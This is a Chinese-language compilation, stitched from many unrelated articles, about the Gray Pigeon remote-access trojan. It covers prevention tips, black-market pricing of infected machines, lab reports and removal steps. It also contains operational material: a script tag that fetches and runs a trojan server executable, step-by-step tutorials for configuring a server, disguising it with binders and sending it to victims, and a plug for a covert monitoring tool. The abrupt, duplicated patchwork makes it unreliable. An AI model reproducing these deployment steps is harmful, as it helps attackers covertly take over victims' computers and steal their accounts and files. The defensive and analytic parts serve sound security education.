灰鸽子木马利用与防护

反病毒专家教你六大绝技彻底防范灰鸽子严循东 2007年3月28日曾经有一个网游爱好者这样形容网络游戏，“网络游戏更像是一场战争，一场玩家与盗号者之间的战争。

”由此可见，盗号已经成为网游世界中，令玩家们深恶痛绝的顽疾。

那么面对以灰鸽子为首的盗号木马，作为网络游戏玩家的你，该如何保护自己的帐号密码完好无损，不被窃取呢？首先，要给自己的电脑做一次“体检”。

因为灰鸽子木马的隐蔽性很强，入侵后根本毫无察觉，通过“体检”，检查一下自己的系统是否已经感染灰鸽子。

“体检”工具就用免费的灰鸽子木马专杀，比如金山毒霸灰鸽子专杀等。

其次，安装正版杀毒软件，保持实时监控的可靠运行，注意及时更新。

灰鸽子的变种非常多，每天都将有不同的变种出现，如果不能及时升级，杀毒软件很难具备对灰鸽子木马新变种的拦截能力。

此外，灰鸽子有个非常“厉害”的特点，黑客可以在远程将控制的所有肉鸡升级到最新版本。

新版本就是专门针对杀毒软件而进行了技术处理的版本，避免被最新的杀毒软件检测到。

因此除了技术手段防范灰鸽子之外，为了捍卫自己的网络资产，玩家还需要从以下几个方面提高警惕：1.注意升级系统补丁，可以用windows update或金山漏洞修复2007来检查修复系统漏洞。

3.游戏玩家的电脑一般在线时间比较长，要特别留意电脑无人值守时的安全问题。

最好把含有隐私信息的数据加密处理。

4.在电脑处于开启状态时，如果不使用摄像头，最好拔掉摄像头，避免被人偷窥。

5.网游玩家通常能熟练的使用线上交易，比如支付宝，网上银行等等。

强烈建议使用专业版移动证书型网上银行，完成支付立即拔掉证书，避免被人远程控制电脑支取。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

灰鸽子产业链一、灰鸽子灰鸽子（Hack. Huigezi）是一个集多种控制方法于一体的木马病毒，一旦用户电脑不幸感染，可以说用户的一举一动都在黑客的监控之下，要窃取账号、密码、照片、重要文件都轻而易举。

更甚的是，他们还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机（不开显示器）并利用摄像头进行录像。

截至2006年底，“灰鸽子”木马已经出现了6万多个变种。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

二、产业链在灰鸽子中,木马的制造者作为第一个环节,仅仅是提供"作案"工具,一般本身不参与到"赚钱"的环节,只是通过卖出"工具"来获利.而传播病毒环节则在购买到病毒之后,再提高价格,一级一级卖给下层的病毒购买者,非常类似于普通产品的经销商模式.木马病毒经过层层传递之后,达到病毒操作者的手里,也就是行话中的"大侠","大侠"在自己进行盗窃,破坏网络的同时召集"徒弟", 教授木马病毒控制技术和网络盗窃技术, 并收取一定的"培训费", 同时将"徒弟"发展为下线,专职盗号或窃取他人信息.被木马侵入的电脑则被形象的称为"肉鸡", "肉鸡"的个人信息,账号,游戏装备,私人照片,私人视频,QQ 号码等被专职盗号的黑客盗取后在网上的正规交易网站正常交易. 除了倒卖"肉鸡"中的数据外, 黑客们还可能将自己没有兴趣的"肉鸡"倒卖给其他的黑客继续摧残, 或者将"肉鸡"倒卖给广告商, 被控制电脑被随意投放广告,甚至干脆控制电脑点击某网站广告,一举一动都能被监视和控制. 如此严密的黑色经济产业链条令人触目惊心. 不仅有严密的产业链条,黑色经济的价格体系也非常完善.据黑客界有关人士介绍, 能够使用几天的"肉鸡"在国内可以卖到0.5 元到1 元一只, 如果可以使用半个月以上, 则可卖到几十元一只.而且不同地区的"肉鸡",价格也不一样:内陆"肉鸡"0.1——0.4 元一只, 辽宁"肉鸡"0.5——0.8 元一只, 广东"肉鸡"1 元一只, 港台"肉鸡"3 块一只, 外国"肉鸡"则能买到5 元一只,在即将到来的北京奥运期间,"奥运肉鸡"将更加抢手.三、产业链具体介绍木马、肉鸡、灰鸽子……这些圈外人刚刚听说的网络用语，构成的不仅是一个庞大的、黑色的、暴利的地下产业帝国，更是一个侵犯网民个人隐私、盗窃网络无形财产的罪恶瘟疫，游戏账号、QQ 密码、银行账号……电脑用户的个人信息和财产被一个个网络黑手窃为己有，而这一切只需要一个软件。

灰鸽子病毒的原理和运行方式是怎么样的灰鸽子远程病毒我想谁都不陌生吧?曾经控制着我们电脑，信息恶意传播，你知道灰鸽子病毒的原理和运行方式吗?下面由店铺给你做出详细的灰鸽子病毒的原理和运行方式介绍!希望对你有帮助!灰鸽子病毒的原理和运行方式介绍：灰鸽子远程监控软件分两部分：客户端和服务端。

黑客(姑且这么称呼吧)操纵着客户端，利用客户端配置生成出一个服务端程序。

服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端(俗称种木马)。

种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行;也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……，这正违背了我们开发灰鸽子的目的，所以本文适用于那些让人非法安装灰鸽子服务端的用户，帮助用户删除灰鸽子 Vip 2005 的服务端程序。

本文大部分内容摘自互联网。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe 时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项)，每次开机都能自动运行，运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。

灰鸽子木马实验报告一、实验目的及要求[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。

[内容及要求]1、练习软件的哪些功能2、通过实验了解灰鸽子是一款的远程控制软件。

3、熟悉使用木马进行网络攻击的原理和方法。

[试验环境]虚拟机下安装组建一个局域网 2台安装了win2000/win2003/XP系统的电脑 灰鸽子木马软件。

二、实验方法与步骤:1 打开虚拟机 开启windows server 2003 A与windows server 2003 B 将其网络设备器设置在同一局域网内 例vmnet22 打开灰鸽子 并查看本机IP地址3 点击配置服务程序 新建一个木马病毒密码可设置也可不设置3 将生产的木马病毒设法放入目标主机 并使其运行原始木马样子4 目标主机运行后 本机灰鸽子显示其登录我们可对目标及进行 下载上传等基本运行5 还可以进行更深层次的控制，例如屏幕捕捉与控制，广播，关机开机，注册表的编辑等 （看红框标识处）(6)灰鸽子木马的伪装，木马捆绑器：现今社会杀毒软件的辨识度已然很高，而人们的警惕度也越来越高，木马若想成功的被目标主机运行，必然要做一定的伪装生成一个可执行文件，虽然风险乜很高，但不失为一种方法！6 木马分离器：三、使用心得1 熟悉灰鸽子之后，我们了解了木马的强大以及危害之处，如何防范木马，是当今信息社会的一种不可不重视的问题。

计算机病毒泛滥尤以木马病毒为甚。

木马病毒是一种远程控制程序 “黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后，可以借助其配套的控制程序来远程控制中毒电脑 肆无忌惮地查看、下载他人电脑中的内容。

掌握了它的原因，对于防护电脑避免木马入侵我们应该有一定对策2 如何防范木马病毒一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。

灰鸽子利用教程图解（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，明白电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面利用，是一款免费的远程控制软件；Netman监控版利用会员登录后再连接，远程电脑无任何提示，对方不会觉察，主要用于监管孩童电脑，掌握孩子上网情形，保护孩子健康上网。

Netman监控版详细安装方式：1.要实现远程监控控制，两边都要安装Netman监控版，两边电脑的安装方式一样，控制端同时也是被控端，只要明白ID和密码，两边能够彼此控制。

2.下载软件解紧缩后，双击“Netman监控版.EXE”，软件默许安装路径为“C:\Program Files\Netman”，能够自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击启动软件，这时会弹出一个提示窗口，问是不是要让软件随系统启动，通常直接点“肯定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必需利用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次利用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，致使第二次利用会员登录时，发觉登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

灰鸽⼦⽊马使⽤教程使⽤灰鸽⼦⽊马控制⼀台电脑
灰鸽⼦简介：
灰鸽⼦是国内⼀款著名后门。

⽐起前辈冰河、⿊洞来，灰鸽⼦可以说是国内后门的集⼤成者。

其丰富⽽强⼤的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚⼊门的初学者都能充当⿊客。

当使⽤在合法情况下时，灰鸽⼦是⼀款优秀的远程控制软件。

但如果拿它做⼀些⾮法的事，灰鸽⼦就成了很强⼤的⿊客⼯具。

使⽤教程：
1、⾸先，在电脑上安装灰鸽⼦，然后进⼊其主页⾯
2、接下来我们点⾃动上线FTP服务器就是你FTP空间的地址
3、下来点配置服务程序，先点⾃动上线设置，IP通知那⾥添上你FTP在HTTP的访问地址加上你放IP⽂件的地址
4、最终我们要把服务器配置成功
5、然后只要把服务端发送给别⼈，别⼈运⾏之后，就可以完全的控制别⼈的电脑了
以上带⼤家了解⽊马病毒对我们的危害以及著名⽊马灰鸽⼦的使⽤原理，并对其原理进⾏深⼊研究。

一禁用系统恢复使用组策略编辑器1. 单击开始，单击运行，键入gpedit.msc，然后单击确定。

2. 展开“计算机配置”，展开“管理模板”，展开“系统”，然后单击系统恢复。

3. 双击“关闭系统恢复”，然后在设置选项卡上，选择禁用。

4. 双击“关闭配置”，然后在设置选项卡上，选择启用。

有关这些设置的作用的详细信息，请在单击属性对话框上的解释选项卡。

5. 单击应用，然后单击确定。

二升级病毒定义库Symantec 可LIVEUPDA TE,NORTON也能吧三在安全模式扫描,并删除感染文件操作后可离开安全模式,跳到四四删除注册表键值Symantec强烈建译备份注册表.click 开始>运行-- 输入regedit,确定后进入HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Connection Wizard删除右侧值: "Compleated" = "1"再进入,删除下列键(key)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\GrayPigeonServerHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_GRAYPIGEONSERVER离开注册表编辑器五查找并停止服务click 开始>运行-- 输入services.msc,确定后进入定位并选择探测到的Trojan.Feutel服务点吉动作(Action)>属性(Properties),点吉停止改变启动类型为手动点吉确定,关闭服务窗口重启XfeliX关于Trojan.Feutel(灰鸽子)病毒无法清除的解决办法前段时间浏览网页的时候，杀毒软件报告发现病毒Trojan.Feutel，病毒位于c:\windiwos，文件名称为G_Server.exe、G_Server.dll和G_Server_Hook.dll，而且杀毒软件无法清除，感觉应该是中了恶意代码（木马）。

灰鸽子木马利用与防护(SEC-W06-001.1)木马，又名特洛伊木马，其名称取自古希腊神话的特洛伊木马记，它是一种基于远程控制的黑客工具，具有很强的隐蔽性和危害性。

为了达到控制服务端主机的目的，木马往往要采用各种手段达到激活自己、加载运行的目的。

本案例以国内著名的灰鸽子木马为例讲述木马的使用和防御。

实验目的●了解木马病毒对终端主机的安全威胁，以及木马病毒如何对主机进行攻击。

实验准备●准备两台电脑，一台为服务器（win2003）和一台为winxp电脑：Win2003 服务器的设置：1．设置IP地址为192.168.25.772．右击我的电脑，选择管理，选择本地用户和组---用户---administrator,设置其密码为demo 3．右击我的电脑，选择属性---远程选项卡，勾选远程桌面下的允许用户远程连接到这台计算机。

（开启了3389端口，通过netstat –an 可以查看）客户机(win xp)：设置其IP地址为192.168.25.78●请下载灰鸽子木马程序(本案例使用的是灰鸽子牵手版)到个人PC(winxp电脑)上。

（把木马程序放在winxp电脑上）如图1如图1●在个人PC上运行远程桌面客户端程序mstsc.exe，输入服务器IP地址192.168.25.77，点击“连接”，登录时用户名为“administrator”，密码为“demo”。

如图2图2●登入远程虚拟平台之后，在服务器上建立“新建文件夹”，重命名为“share”，然后右击文件夹，选择“属性”，在“共享”栏中，选择“共享该文件夹” 。

如图3图3为了通过网络共享从本地拷贝文件到虚拟平台，确认控制权限为“完全控制”。

如图4图4以上操作的目的是，为了以后把winxp上生成的服务端程序拷贝到服务器的共享文件夹share 中。

实验步骤下载使用灰鸽子木马步骤说明：下载和使用灰鸽子木马1.在winxp电脑上，打开已经下载好的灰鸽子木马所在的文件夹qs2004，双击里面的灰鸽子客户端H_client(本案例中如果碰到灰鸽子客户端无法打开的情形，请从“灰鸽子_牵手.zip”重新解压生成一个新的客户端程序再执行）。

灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马是一种常见的网络攻击手段，它的原理是通过植入恶意代码，控制被攻击计算机的行为，从而达到攻击者的目的。

下面将详细
介绍灰鸽子木马的原理。

1. 植入恶意代码
灰鸽子木马的第一步是植入恶意代码。

攻击者可以通过各种方式将恶
意代码植入到目标计算机中，比如通过电子邮件、网络钓鱼等方式。

一旦恶意代码被植入到计算机中，它就会开始执行攻击者的指令。

2. 控制被攻击计算机
一旦恶意代码被植入到计算机中，攻击者就可以通过远程控制的方式
控制被攻击计算机的行为。

攻击者可以利用被攻击计算机的资源，比
如计算能力、存储空间等，进行各种恶意活动，比如发起DDoS攻击、窃取敏感信息等。

3. 隐藏行踪
为了避免被发现，攻击者通常会采取一些措施来隐藏自己的行踪。

比如，他们可能会使用代理服务器或虚拟专用网络（VPN）来隐藏自己的IP地址，或者使用加密技术来保护通信内容，使其难以被监测和识别。

总之，灰鸽子木马是一种非常危险的网络攻击手段，它可以给受害者带来严重的损失。

为了保护自己的计算机安全，我们应该时刻保持警惕，不要轻易打开来路不明的邮件和链接，同时也要安装好杀毒软件和防火墙，及时更新系统和软件补丁，以提高自己的计算机安全防护能力。

灰鸽子木马原理灰鸽子木马是一种具有高度隐蔽性和破坏力的恶意软件，其原理基于社会工程学和网络攻击技术。

它通过诱骗用户点击伪装成正常文件或链接的恶意程序，从而实现对目标系统的入侵和控制。

本文将详细介绍灰鸽子木马的原理及其对网络安全的威胁。

一、灰鸽子木马的传播方式灰鸽子木马传播的主要方式是通过电子邮件、社交媒体、P2P软件等渠道传播。

攻击者会利用社会工程学手段，伪装成可信的来源，诱使用户点击恶意链接或下载恶意附件。

一旦用户受骗，恶意软件便会悄无声息地运行在用户的计算机上。

二、灰鸽子木马的工作原理灰鸽子木马的工作原理可以分为三个主要阶段：潜伏、入侵和控制。

1. 潜伏阶段：灰鸽子木马首先潜伏在目标系统中，它会自动在系统中创建隐藏的文件和注册表项，以保证自身的持久性。

在这个阶段，灰鸽子木马会尽可能地隐藏自己，避免被用户或防病毒软件发现。

2. 入侵阶段：一旦潜伏成功，灰鸽子木马将利用漏洞或弱密码等方式入侵目标系统。

它会通过网络传输协议与控制服务器建立连接，获取控制指令并执行。

攻击者可以通过灰鸽子木马远程控制目标系统，窃取敏感信息或进行其他恶意活动。

3. 控制阶段：在控制阶段，攻击者可以远程操控被感染的系统，执行各种指令。

他们可以窃取用户的个人信息、银行账户密码等敏感数据，也可以利用被感染的计算机进行DDoS攻击、发送垃圾邮件等恶意行为。

三、灰鸽子木马对网络安全的威胁灰鸽子木马作为一种高级威胁，给网络安全带来严重威胁。

1. 用户隐私泄露：灰鸽子木马可以窃取用户的个人信息、登录凭证、银行卡信息等敏感数据，从而导致用户隐私泄露和财产损失。

2. 网络攻击：攻击者可以通过灰鸽子木马远程控制目标系统，将其作为攻击平台，发起DDoS攻击、扫描其他目标等，对网络安全造成重大影响。

3. 信息窃取和利益盗窃：灰鸽子木马可以窃取企业的商业机密、研发数据等重要信息，给企业带来巨大经济损失。

四、如何保护自己免受灰鸽子木马的侵害为了保护自己的计算机和网络安全，我们可以采取以下措施：1. 慎重点击链接和下载附件：不要随意点击邮件中的链接或下载附件，尤其是来自不明或可疑来源的邮件。

木马灰鸽子防护场景灰鸽子是国内一个著名的后门程序。

灰鸽子变种木马运行后，会自我复制到Windows目录下，并自行将安装程序删除。

修改注册表，将病毒文件注册为服务项实现开机自启。

木马程序还会注入所有的进程中，隐藏自我，防止被杀毒软件查杀。

自动开启IE浏览器，以便与外界进行通信，侦听黑客指令，在用户不知情的情况下连接黑客指定站点，盗取用户信息、下载其它特定程序。

通过对灰鸽子的运行过程及原理进行了解，掌握对木马的防御实验目标●掌握木马的原理●通过木马对主机控制过程的了解，掌握防御方法●树立安全的防范意识●可以根据环境要求设定有效的防范策略实验拓扑VM Server VM Client实验环境Server：Windows XP[服务端]（因实验需要 Server 服务端登录账户：administrator，密码：123456）Client：Windows XP[客户端]灰鸽子[企业版]Server_Setup.exe服务端木马(可由灰鸽子生成)灰鸽子专杀工具[工具]利用灰鸽子进行控制灰鸽子木马程序版本众多，这里我们选择了使用较多的“灰鸽子远程管理企业版Build060228”版本。

【注释】安装灰鸽子客户端程序，目的为了控制被种植了灰鸽子服务端程序的肉鸡，客户端本身没有危害性。

1.在客户端上运行“灰鸽子[企业版]”程序，主界面如图 1：(图1)2.点击工具栏中的“配置服务程序”按钮，弹出如图2对话框，可根据自己要求定制生成服务端程序，用于种植在肉鸡中。

(图2)【注释】用户可以定制肉鸡服务端开放的端口、连接密码、控制权限等。

自动上线功能可以在肉鸡启动时，自动告知控制者上线信息。

3.添加好相应的信息后,点击“生成服务器”按钮，可以生成EXE可执行程序。

这里我们在C盘根目录已经提供了一个生成好的服务端程序Server_Setup.exe，其连接端口为7812，连接密码为7812，具有所有控制权限。

4.把生成的Server_Setup.exe通过网络共享方式复制至服务端上，并在服务器上双击运行该程序。

灰鸽子木马原理一、什么是灰鸽子木马灰鸽子木马是一种具有高度隐蔽性和持久性的远程控制软件。

它通常通过钓鱼邮件、恶意下载和网络漏洞利用等方式传播，目的是植入受害者计算机系统，并使黑客能够远程控制和监控计算机。

灰鸽子木马得名于它使用灰鸽子作为其标志性图标。

二、灰鸽子木马的传播方式1.钓鱼邮件：黑客通过发送看似合法和诱人的邮件，含有携带灰鸽子木马的附件或恶意链接。

当受害者打开附件或点击链接时，木马会悄悄地进入系统。

2.恶意下载：黑客会在一些不安全的网站上发布包含恶意代码的软件或文件。

当用户在这些网站上下载并安装软件时，木马就会感染受害者的计算机系统。

3.网络漏洞利用：黑客会利用已知的系统漏洞来传播灰鸽子木马。

他们通过扫描网络，寻找可利用的漏洞，并通过这些漏洞远程感染受害者的计算机。

三、灰鸽子木马的工作原理灰鸽子木马主要包括三个核心部分：客户端程序、服务器端程序和控制面板。

1.客户端程序：客户端程序是指感染了受害者计算机的木马程序。

一旦成功感染，客户端程序便开始在计算机中植入和运行。

它通过窃取敏感信息或监控用户行为来完成黑客的意图。

2.服务器端程序：服务器端程序是黑客控制灰鸽子木马的中央管理系统。

黑客使用服务器端程序来监控和控制感染了客户端程序的计算机。

3.控制面板：控制面板是黑客使用的用户界面，它允许黑客查看和操纵感染了灰鸽子木马的客户端计算机。

通过控制面板，黑客可以发送指令、收集信息和执行各种操作。

灰鸽子木马主要通过以下方式实现远程操控和监控：1.启动自动运行：灰鸽子木马会在感染计算机时添加自启动项，确保在计算机启动时自动运行，以保持持久性。

2.反向连接：客户端程序会与服务器端程序建立一个隐藏的反向连接，使黑客能够远程访问受感染计算机的指令和数据。

3.远程执行命令：黑客可以通过控制面板发送指令给感染了灰鸽子木马的客户端计算机，实现远程执行命令。

4.收集敏感信息：客户端程序可以记录受害者的键盘输入、屏幕截图和网络流量等信息，并将其传输到服务器端程序。

“灰鸽子”病毒代码的特点和关键技术解析一、“灰鸽子”病毒概述灰鸽子是国内一款著名后门，比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

灰鸽子客户端和服务端都是采用Delphi编写，黑客利用客户端程序配置出服务端程序。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

灰鸽子英文名为W in32.Hack.Huigez，这个木马黑客工具大致于2001年出现在互联网，当时被判定为高危木马。

灰鸽子病毒危害程度非常大，是熊猫烧香的10倍以上，灰鸽子病毒集中爆发，据推算，有2000万台电脑可能被控制，而黑客随之买卖控制权，月入上万元。

经过其作者不懈努力，该病毒从2004年起连续五年荣登国内10大病毒排行榜，至今已经衍生出超过10万个变种。

二、“灰鸽子”的关键技术1.植入技术灰鸽子植入是灰鸽子攻击目标系统最关键的一步，是后续攻击活动的基础。

当前，灰鸽子的植入方法可以分为两大类，即被动植入和主动植入。

被动植入是指通过人工干预方式才能将灰鸽子程序安装到目标系统中，植入过程必须依赖于受害用户的手工操作；而主动植入则是指主动攻击方法，是将灰鸽子程序通过程序自动安装到目标系统中，植入过程无需受害用户的操作。

被动植入主要通过社会工程方法将灰鸽子程序伪装成合法的，以达到降低受害用户警觉性,诱骗用户的目的。

2.隐藏技术灰鸽子设计者为了能逃避安全检测,就要设法隐藏灰鸽子的行为或痕迹，其主要技术目标就是将灰鸽子的本地活动行为、灰鸽子远程通信过程进行隐藏。

2.1本地行为活动隐藏现在的操作系统支持LKM (Loadable KernelModules)功能，通过LKM可增加系统功能，而且不需要重新编译内核，就可以动态地加载，如Linux, Solaris和FreeBSD都支持LKM。

电脑病毒“灰鸽子”推荐文章怎么防止电脑感染灰鸽子木马热度：如何防止电脑感染灰鸽子木马成为肉鸡热度：电脑中了灰鸽子病毒怎么样查杀热度：中了灰鸽子怎么解决热度：灰鸽子病毒的原理和运行方式是怎么样的热度：灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒，用户电脑不幸感染，一举一动就都在黑客的监控之下，窃取账号、密码、照片、重要文件都轻而易举，下面店铺为大家详细的介绍下灰鸽子病毒，希望对你有帮助，谢谢。

灰鸽子病毒：灰鸽子还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机并利用摄像头进行录像。

截至2006年底，“灰鸽子”木马已经出现了6万多个变种。

合法情况下使用，它是一款优秀的远程控制软件。

如果做一些非法的事，灰鸽子就成了强大的黑客工具。

灰鸽子客户端和服务端采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型、主动连接时使用的公网IP、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

中文学名灰鸽子自2001年，灰鸽子诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序，并引发了安全领域的高度关注。

2004年、2005年、2006年，灰鸽子木马连续三年被国内各大杀毒厂商评选为年度十大病毒，灰鸽子也因此声名大噪，逐步成为媒体以及网民关注的焦点。

人们在震惊于灰鸽子给广大电脑用户带来的危害的同时，不禁要问，灰鸽子是如何从一个模仿其他病毒开始，发展成为国内极具影响的十大病毒、甚至毒王的呢?[1]灰鸽子自2001年出现至今，主要经历了模仿期、飞速发展期以及全民黑客时代三大阶段。

灰鸽子服务端加壳之后仅有70kb，比葛军的灰鸽子小了近10倍。

国家多线程上线分组。

可视化远程开户。

可以躲过主流管理员的检测方式。

隐蔽性强。

模仿期飞速发展期全民黑客时代2001年-2003年2004年-2005年2006年-2007年模仿期(2001年-2003年)2001年，国内互联网逐步走向普及，网络病毒也伴随着互联网的发展日益取代传统意义上的病毒，而到了2002年，以“电子邮件”、“网络下载和浏览”等方式传播的病毒开始大量涌现，互联网安全成为大众关注的焦点。